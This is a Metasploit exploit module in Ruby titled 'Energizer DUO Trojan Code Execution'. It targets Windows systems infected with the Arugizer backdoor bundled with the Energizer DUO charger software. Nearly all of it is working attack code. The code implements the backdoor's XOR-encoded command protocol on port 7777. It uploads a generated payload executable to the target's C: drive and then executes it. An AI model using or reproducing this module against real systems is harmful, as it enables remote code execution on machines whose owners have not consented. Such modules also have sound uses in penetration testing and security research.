Energizer DUO Trojan Code Execution



##

# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::EXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Energizer DUO Trojan Code Execution',
            'Description'    => %q{
                    This module will execute an arbitrary payload against
                any system infected with the Arugizer trojan horse. This
                backdoor was shipped with the software package accompanying
                the Energizer Duo USB battery charger.
            },
            'Author'         => [ 'hdm' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10389 $',
            'References'     =>
                [
                    ['CVE', '2010-0103'],
                    ['OSVDB', '62782'],
                    ['US-CERT-VU', '154421']
                ],
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 05 2010'
            ))


        register_options(
            [
                Opt::RPORT(7777),
            ], self.class)
    end

    def trojan_encode(str)
        str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
    end

    def trojan_command(cmd)
        cid = ""

        case cmd
        when :exec
            cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
        when :dir
            cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
        when :write
            cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
        when :read
            cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
        when :nop
            cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
        when :find
            cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
        when :yes
            cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
        when :runonce
            cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
        when :delete
            cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
        end

        trojan_encode(
            [cid.length + 1].pack("V") + cid  + "\x00"
        )
    end

    def exploit

        nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
        exe = generate_payload_exe + "\x00"


        print_status("Trying to upload #{nam}...")
        connect

        # Write file request
        sock.put(trojan_command(:write))
        sock.put(trojan_encode([nam.length].pack("V")))
        sock.put(trojan_encode(nam))
        sock.put(trojan_encode([exe.length].pack("V")))
        sock.put(trojan_encode(exe))

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect

        #
        # Execute the payload
        #

        print_status("Trying to execute #{nam}...")

        connect

        # Execute file request
        sock.put(trojan_command(:exec))
        sock.put(trojan_encode([nam.length].pack("V")))
        sock.put(trojan_encode(nam))

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect
    end
end